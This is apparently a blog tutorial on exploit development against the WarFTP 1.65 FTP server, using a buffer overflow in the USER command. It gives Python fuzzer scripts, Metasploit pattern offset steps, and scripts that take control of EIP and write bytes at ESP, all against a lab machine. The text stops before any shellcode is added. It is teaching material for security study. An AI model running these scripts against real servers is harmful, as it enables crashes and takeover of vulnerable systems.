Wednesday 19 September 2012

Exploit WarFTP 1.65 using Buffer Overflow

Okay, now we will learn about attacking a vulnerable application using a buffer overflow. Before that, it is better to first understand what a buffer overflow is.

What is a buffer overflow? A buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of a memory-safety violation. Buffer overflows can be triggered by inputs that are designed to execute code or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security.

Now we will try to attack a vulnerability in WarFTP 1.65 using a buffer overflow. Why WarFTP? Because WarFTP has no protection against buffer overflow attacks.

The tools we need for vulnerability testing with a buffer overflow are:

1. OllyDbg, as a debugger.
2. A fuzzer, for the fuzzing process.
3. Python, for writing the fuzzer and the exploit.
4. Windows XP, where WarFTP runs.
5. Backtrack OS, where the fuzzer runs.

Okay, run WarFTP on Windows XP. If you do not have WarFTP installed on your Windows XP, you can download the WarFTP file at the end of this article.

Once WarFTP is running on Windows XP, we will write the fuzzer that sends data to the FTP service. The fuzzer is written in Python.

#!/usr/bin/python
import socket                                          # Python 2 script, as on Backtrack: str is a byte string
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP socket to the FTP service
buffer = "\x41" * 1000                                 # 1000 "A" characters
s.connect(('192.168.56.101', 21))                      # WarFTP host (lab IP) and port 21
data = s.recv(1024)                                    # read the FTP banner
print("Sending evil data via USER command...")
s.send('USER ' + buffer + '\r\n')                      # oversized USER command
data = s.recv(1024)                                    # read the server's reply
s.send('PASS ' + '\r\n')                               # empty password, to complete the login sequence
s.close()
print("Finish")
Look at row 4 of the code above: it creates a variable named buffer that contains 1000 "A" characters. Row 5 connects to the target IP on port 21. Row 8 sends the USER command of the FTP protocol with the buffer as the user name, and the script then sends PASS.

Okay, now run the WarFTP program and start the WarFTP service by clicking the lightning icon, or go to Properties -> Start Service.


Then try to connect to the FTP service with nc from Backtrack, using the command below.
root@bt:~# nc 192.168.56.101 21
If the configuration is right and the WarFTP server is already running, a window like the one below will appear.

Next, run the fuzzer application we just wrote, using the command below.
root@bt:~# python xfuzz.py
If the step was done correctly, the WarFTP window will disappear from the screen: the application crashes while processing the data sent by the fuzzer.

Next we want to know what actually happens inside the WarFTP server that makes it crash. In the next step we run WarFTP under a debugger to watch how the data is processed.

For debugging we will use OllyDbg. Run the WarFTP server from OllyDbg. If an error message appears, delete the file FtpDaemon.DAT, run the WarFTP server again and create a dummy user.


Run WarFTP from OllyDbg again, then re-run the fuzzer from Backtrack. What happens? With WarFTP running under OllyDbg we can see the state of the registers at the moment of the crash. Four registers are overwritten by the data the fuzzer sent: ESP, EDI, EBP and EIP.

In the next step we find out at which byte the EIP register is overwritten, using the Metasploit Framework. One Metasploit tool commonly used in exploit development is pattern_create. pattern_create is used to find the exact locations of strings in the data packets that the fuzzer sends to the application. To run pattern_create.rb, first change to the folder /pentest/exploits/framework/tools/.

root@bt:/pentest/exploits/framework2/tools#
Then run this command from inside that folder.

./pattern_create.rb 1000 > string_pattern.txt
pattern_create writes string_pattern.txt, whose contents are 1000 bytes of pattern characters. Copy the string from string_pattern.txt into the fuzzer, replacing the buffer string. Then fuzz the WarFTP application again and see what happens.

Unlike before, the memory of the WarFTP server is now filled with the string pattern entered in the fuzzer.


Then we calculate the byte position inside the pattern made by pattern_create.rb using pattern_offset, which lives in the same folder as pattern_create. To run it, just pass the value found in ESP and in EIP. pattern_offset calculates how many bytes lie between the start of the pattern and the string contained in the register.
./pattern_offset.rb 32714131
The result for EIP is 485.
./pattern_offset.rb q4Aq5Aq
The result for ESP is 493.
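To show how pattern_create and pattern_offset arrive at 485 and 493, here is an added Python 3 example (not code from this article or from Metasploit) that rebuilds the same Upper-lower-digit pattern scheme, turns the EIP value OllyDbg showed (32714131) back into pattern text by undoing little-endian byte order, and checks that a 485-byte filler followed by EF BE AD DE reads back as DEADBEEF.

```python
import string
import struct

# Same character scheme as Metasploit's pattern_create.rb: every 3-byte
# chunk is <Upper><lower><digit>, so any 4-byte window is unique within
# the first 20280 bytes of the pattern.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern."""
    pattern = ""
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                pattern += u + l + d
                if len(pattern) >= length:
                    return pattern[:length]
    return pattern[:length]


def dword_to_string(hex_value):
    """Undo little-endian order on a register value shown by OllyDbg:
    '32714131' (0x32714131) becomes the pattern text '1Aq2'."""
    return struct.pack("<I", int(hex_value, 16)).decode("latin-1")


def pattern_offset(needle, length=1000):
    """0-based offset of `needle` in the pattern, -1 if it is not there."""
    return pattern_create(length).find(needle)


def dword_at(buf, offset):
    """Hex of the DWORD a register receives from buf[offset:offset+4]."""
    raw = buf[offset:offset + 4].encode("latin-1")
    return "%08X" % struct.unpack("<I", raw)[0]


if __name__ == "__main__":
    eip_text = dword_to_string("32714131")          # EIP value from the crash
    print("EIP holds %r at offset %d" % (eip_text, pattern_offset(eip_text)))
    print("ESP text starts at offset %d" % pattern_offset("q4Aq5Aq"))
    # Constructed probe: 485 filler bytes, then EF BE AD DE.
    probe = "\x90" * 485 + "\xEF\xBE\xAD\xDE"
    print("EIP would read %s" % dword_at(probe, 485))  # DEADBEEF
```

Offsets are 0-based, so offset 485 is the 486th byte of the buffer, matching the byte positions 486 to 489 that the article counts.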

From the result we know that the EIP register is overwritten by 4 bytes of the buffer: bytes 486, 487, 488 and 489. To prove it, we customize the fuzzer by changing the value of the buffer variable. The fuzzing script now looks like below; the value placed in EIP is DEADBEEF.
  
#!/usr/bin/python
import socket                                          # Python 2 script, as on Backtrack
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                                  # filler up to the EIP offset found above
buffer += "\xEF\xBE\xAD\xDE"                           # the 4 bytes that land in EIP: 0xDEADBEEF, little-endian
s.connect(('192.168.56.101', 21))                      # WarFTP host (lab IP) and port 21
data = s.recv(1024)                                    # read the FTP banner
print("Sending evil data via USER command...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS ' + '\r\n')
s.close()
print("Finish")
Run WarFTP from OllyDbg again, and run the fuzzer application too. See the result.


The value of EIP in the register log has changed to DEADBEEF. Next we try to write to the memory ESP points at. Once again, customize the fuzzer script.

#!/usr/bin/python
import socket                                          # Python 2 script, as on Backtrack
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                                  # filler up to the EIP offset
buffer += "\xEF\xBE\xAD\xDE"                           # EIP becomes 0xDEADBEEF
buffer += "\x90" * (493 - len(buffer))                 # pad up to the ESP offset found above
buffer += "\xCC" * (1000 - len(buffer))                # 0xCC bytes from the ESP offset to 1000 bytes total
s.connect(('192.168.56.101', 21))                      # WarFTP host (lab IP) and port 21
data = s.recv(1024)                                    # read the FTP banner
print("Sending evil data via USER command...")
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.send('PASS ' + '\r\n')
s.close()
print("Finish")
